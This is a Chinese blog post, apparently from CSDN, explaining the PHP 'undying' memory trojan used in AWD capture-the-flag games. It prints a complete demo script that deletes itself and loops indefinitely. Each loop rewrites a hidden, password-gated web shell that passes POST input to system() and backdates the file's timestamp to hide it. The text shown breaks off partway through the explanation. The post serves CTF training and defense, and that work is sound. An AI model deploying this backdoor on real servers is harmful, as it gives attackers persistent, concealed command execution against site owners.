PHP内存型木马

最新推荐文章于 2025-04-18 14:27:03 发布

Mi1k7ea

最新推荐文章于 2025-04-18 14:27:03 发布

阅读量8k

点赞数 5

分类专栏： Web安全文章标签： PHP内存性木马 PHP不死马

本文链接：https://blog.csdn.net/ski_12/article/details/84920127

版权

本文介绍了PHP内存性木马，也称为PHP不死马，详细阐述了其工作原理，包括ignore_user_abort()和set_time_limit()函数的使用，以及如何通过unlink()函数删除自身以隐藏踪迹。同时，文章提供了查杀这种木马的方法，包括重启服务、杀死www-data用户进程、创建同名目录以及编写竞争脚本等策略。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

基本概念

PHP内存性木马即PHP不死马，一般会删除自身以进程的形式循环创建隐蔽的后门。

通常在AWD Web题中用得较多。

Demo及原理

nodie.php

<?php
	ignore_user_abort(true);
	set_time_limit(0);
	unlink(__FILE__);
	$file = '/var/www/dvwa/.ski12.php';
	$code = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@system($_POST[a]);}?>';
	while (1) {
		file_put_contents($file, $code);
		system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
		usleep(5000);
	}
?>

简单分析：

ignore_user_abort()函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开，即使与客户机断开脚本仍会执行。

set_time_limit()函数设置脚本最大执行时间。这里设置为0，